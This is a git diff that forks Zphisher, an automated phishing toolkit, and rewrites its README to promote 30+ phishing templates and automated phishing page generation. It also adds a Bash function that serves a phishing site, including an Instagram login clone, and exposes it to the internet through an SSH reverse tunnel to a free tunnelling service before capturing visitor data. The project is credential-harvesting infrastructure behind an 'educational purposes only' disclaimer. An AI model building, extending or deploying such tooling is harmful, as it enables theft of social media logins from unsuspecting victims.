diff --git a/.sites/instagram/index.php b/.sites/instagram/index.php index f38c5805..699690e1 100644 --- a/.sites/instagram/index.php +++ b/.sites/instagram/index.php @@ -1,5 +1,5 @@ diff --git a/.sites/instagram/login.php b/.sites/instagram/login.php index b7a4f4ef..187196c9 100644 --- a/.sites/instagram/login.php +++ b/.sites/instagram/login.php @@ -1,6 +1,5 @@ \ No newline at end of file +?> diff --git a/README.md b/README.md index 4c4b5076..ad216f32 100644 --- a/README.md +++ b/README.md @@ -1,189 +1,30 @@ - +# zphisher-jr -

- -

+[![Made with Bash](https://img.shields.io/badge/Made%20with-Bash-blue.svg)](https://www.gnu.org/software/bash/) +[![License](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE) +[![Status](https://img.shields.io/badge/Status-Work%20in%20Progress-yellow.svg)](#) -

- - - - - -

+A **custom fork** of [Zphisher](https://github.com/htr-tech/zphisher) focused on adding **free port forwarding services**. +Currently supports [Pinggy](https://pinggy.io/) — more tunnelling services coming soon! -

- - - - - -

+> **Note:** This tool is for **educational purposes only**. +> The author is **not responsible** for any misuse. -

A beginners friendly, Automated phishing tool with 30+ templates.

+--- -## +## ✨ Features -

Disclaimer

+- 🎯 30+ phishing templates (from the original Zphisher) +- ⚡ Automated phishing page generation +- 🌐 Integrated **Pinggy** tunnelling support +- 🔄 Works with Cloudflared & LocalXpose +- 💻 Simple CLI interface -Any actions and or activities related to Zphisher is solely your responsibility. The misuse of this toolkit can result in criminal charges brought against the persons in question. The contributors will not be held responsible in the event any criminal charges be brought against any individuals misusing this toolkit to break the law. +--- -This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way. +## 🚀 Getting Started -This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here! - -It only demonstrates "how phishing works". You shall not misuse the information to gain unauthorized access to someones social media. However you may try out this at your own risk. - -## - -### Features - -- Latest and updated login pages. -- Beginners friendly -- Multiple tunneling options - - Localhost - - Cloudflared - - LocalXpose -- Mask URL support -- Docker support - -## - -### Installation - -- Just, Clone this repository - - ``` - git clone --depth=1 https://github.com/htr-tech/zphisher.git - ``` - -- Now go to cloned directory and run `zphisher.sh` - - ``` - $ cd zphisher - $ bash zphisher.sh - ``` - -- On first launch, It'll install the dependencies and that's it. ***Zphisher*** is installed. - -## - -### Installation (Termux) -You can easily install zphisher in Termux by using tur-repo -``` -$ pkg install tur-repo -$ pkg install zphisher -$ zphisher -``` -### A Note : -***Termux discourages hacking*** .. So never discuss anything related to *zphisher* in any of the termux discussion groups. For more check : [wiki](https://wiki.termux.com/wiki/Hacking) - -## - -

- -

- -## - -### Installation via ".deb" file - -- Download `.deb` files from the [**Latest Release**](https://github.com/htr-tech/zphisher/releases/latest) -- If you are using ***termux*** then download the `*_termux.deb` - -- Install the `.deb` file by executing - ``` - apt install - ``` - Or - ``` - $ dpkg -i - $ apt install -f - ``` - -## - -### Run on Docker - -- Docker Image Mirror: - - **DockerHub** : - ``` - docker pull htrtech/zphisher - ``` - - **GHCR** : - ``` - docker pull ghcr.io/htr-tech/zphisher:latest - ``` - -- By using the wrapper script [**run-docker.sh**](https://raw.githubusercontent.com/htr-tech/zphisher/master/run-docker.sh) - - ``` - $ curl -LO https://raw.githubusercontent.com/htr-tech/zphisher/master/run-docker.sh - $ bash run-docker.sh - ``` -- Temporary Container - - ``` - docker run --rm -ti htrtech/zphisher - ``` - - Remember to mount the `auth` directory. - -## - -
-

Dependencies

- -Zphisher requires following programs to run properly - -- `git` -- `curl` -- `php` - -> All the dependencies will be installed automatically when you run **Zphisher** for the first time. -
- -
-

Tested on

- -- **Ubuntu** -- **Debian** -- **Arch** -- **Manjaro** -- **Fedora** -- **Termux** -
- -## - -

:: Workflow ::

-

- -

- -## - -### Find Me on: -

- - -

- - -### *Thanks to all contributors*: - - - - - - - - - - - - - - - - - -

1RaY-1

Aditya Shakya

Ali Milani

AmnesiA

KasRoudra

Moises Tapia

Mr.Derek

Mustakim Ahmed

sepp0

TripleHat

Yisus7u7
- - +### 1️⃣ Clone the Repository +```bash +git clone https://github.com/jrdevadattan/zphisher-jr.git +cd zphisher-jr diff --git a/zphisher.sh b/zphisher.sh index 8cc65912..01f7037d 100755 --- a/zphisher.sh +++ b/zphisher.sh @@ -508,6 +508,24 @@ start_loclx() { capture_data } +## Start pinggy +start_pinggy() { + read -p "[?] Enter your local port to start server on (default 8080): " port + port=${port:-8080} + + echo -e "\n[+] Starting local server on port $port..." + setup_site # Your server start command or function + sleep 3 + + echo -e "\e[1;31m[!!! IMPORTANT !!!] SSH password is: blank (type 'blank' when prompted)\e[0m" + echo -e "\n[+] Starting Pinggy tunnel forwarding localhost:$port ...\n" + ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:$port qr@free.pinggy.io & + + sleep 5 # Give tunnel time to establish + + capture_data # Start capturing visitor data +} + ## Start localhost start_localhost() { cusport @@ -526,6 +544,7 @@ tunnel_menu() { ${RED}[${WHITE}01${RED}]${ORANGE} Localhost ${RED}[${WHITE}02${RED}]${ORANGE} Cloudflared ${RED}[${CYAN}Auto Detects${RED}] ${RED}[${WHITE}03${RED}]${ORANGE} LocalXpose ${RED}[${CYAN}NEW! Max 15Min${RED}] + ${RED}[${WHITE}04${RED}]${ORANGE} Pinngy ${RED}[${CYAN}NEW! Max 60Min${RED}] EOF @@ -538,6 +557,8 @@ tunnel_menu() { start_cloudflared;; 3 | 03) start_loclx;; + 4 | 04) + start_pinggy;; *) echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..." { sleep 1; tunnel_menu; };;